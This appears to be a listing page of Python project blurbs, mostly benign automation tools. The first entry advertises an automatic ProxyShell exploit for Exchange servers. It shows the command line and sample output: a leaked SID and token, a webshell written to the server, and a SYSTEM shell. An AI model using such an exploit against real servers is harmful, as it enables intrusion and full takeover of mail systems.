Automatic ProxyShell Exploit In Python

python3 proxyshell.py -t exchange.lab.local fqdn exchange.lab.local + [email protected] legacyDN /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=admin leak_sid S-1-5-21-3626636094-1513906978-1376853856-1156 token VgEAVAdX[cut]AAAA== set_ews Success with subject badqxybxtecxuttq write webshell at aspnet_client/tjmzk.aspx nt authoritysystemSHELL>“> usage: proxyshell.py [-h] -t T Automatic Exploit ProxyShell optional arguments: -h, –help show this help message and exit -t T Exchange URL Usage: C:>python3 proxyshell.py -t exchange.lab.local fqdn exchange.lab.local + [email protected] legacyDN /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=admin leak_sid S-1-5-21-3626636094-1513906978-1376853856-1156 token VgEAVAdX[cut]AAAA== set_ews Success with subject badqxybxtecxuttq write webshell at aspnet_client/tjmzk.aspx nt […]

Read more

Duckiter will Automatically dockerize your Django projects

Duckiter Duckiter will Automatically dockerize your Django projects. Requirements : – python version : python version 3.6 or upper version – OS : – linux – MacOS – windows ( drop support ) – docker engine installed in your machine and already run through the usage of package Installation : clone project: pip install duckiter Usage : Duckiter has two individual steps: ​ 1- initialize Dockerfile ​ 2- build image from created Dockerfile To initialize Dockerfile (step 1) : in […]

Read more

A Python application to automatize the process of uploading files to Amazon S3

intelligent-s3-upload Upload files or folders (even with subfolders) to Amazon S3 in a totally automatized way taking advantage of: Amazon S3 Multipart Upload: The uploaded files are processed transparently in parts improving the throughput and the quick recovery from any network issues. Resilent Retry System: Intelligent S3 Upload has been built to detect any error during the uploading process and to perform any retries whenever is necessary. User Friendly Interface: Just check the demo to see with your own eyes […]

Read more

Automatic Calibration for Non-repetitive Scanning Solid-State LiDAR and Camera Systems

ACSC Automatic extrinsic calibration for non-repetitive scanning solid-state LiDAR and camera systems. System Architecture 1. Dependency Tested with Ubuntu 16.04 64-bit and Ubuntu 18.04 64-bit. ROS (tested with kinetic / melodic) Eigen 3.2.5 PCL 1.8 python 2.X / 3.X python-pcl opencv-python (>= 4.0) scipy scikit-learn transforms3d pyyaml mayavi (optional, for debug and visualization only) 2. Preparation 2.1 Download and installation Use the following commands to download this repo. Notice: the SUBMODULE should also be cloned. git clone –recurse-submodules https://github.com/HViktorTsoi/ACSC Compile […]

Read more

A fully automated system that transforms Twitch clips into gaming compilations

TwitchCompilationCreator A fully automated system that transforms Twitch clips into gaming compilations Authors: Christian C., Moritz M., Luca S. About This is our approach of automatically creating compilations of twitch clips (focused on gaming).We are very interested in YouTube, Twitch and Programming so we started this as an experiment, now a few months later we have to say it worked! What did we achieve? We automatically uploaded over 100 videos to our YouTube channel without any human interaction One video […]

Read more

A Simplified Automated CLI tool for GIT

GitFun A Simplified Automated CLI tool for GIT, It’s for Lazy Developers and Newbies Installation It’s simple step to install Pre-requisites: Python > = 3.7 Python Package Installer(PyPI) pip install gitfun For initial push to the remote Repository fun pushbranch -url -m commit message -b branch name For checking the git status fun status For checking the remote fun remote For getting a pull from the branch fun pullbranch -url -b branch name for development setup clone the repository git […]

Read more

An open-source package for automatized pattern generation for nano-structuring

GDSHelpers GDSHelpers in an open-source package for automatized pattern generation for nano-structuring. It allows exporting the pattern in the GDSII-format and OASIS-format, which are currently mainly used for describing 2D-masks. Currently, the focus is mainly on photonic and superconducting circuitry. The library consists of growing list of parts, which can be composed into larger circuits. So far, the following parts are implemented: A waveguide part, allowing easy chaining of bends and straight waveguides. Includes parameterized paths and Bézier curves. Automatic […]

Read more

Scientific measurement library for instruments, experiments, and live-plotting

PyMeasure scientific package PyMeasure makes scientific measurements easy to set up and run. The package contains a repository of instrument classes and a system for running experiment procedures, which provides graphical interfaces for graphing live data and managing queues of experiments. Both parts of the package are independent, and when combined provide all the necessary requirements for advanced measurements with only limited coding. PyMeasure is currently under active development, so please report any issues you experience to our Issues page. […]

Read more

A Tool for automatically reordering python imports

reorder_python_imports Rewrites source to reorder python imports. Tool for automatically reordering python imports. Similar to isort but uses static analysis more. Installation pip install reorder-python-imports Console scripts Consult reorder-python-imports –help for the full set of options. reorder-python-imports takes filenames as positional arguments Common options: –py##-plus: see below. –add-import / –remove-import: see below. –replace-import: see below. –application-directories: by default, reorder-python-imports assumesyour project is rooted at .. If this isn’t true, tell it where yourimport roots live. For example, when using the […]

Read more
1 3 4 5 6 7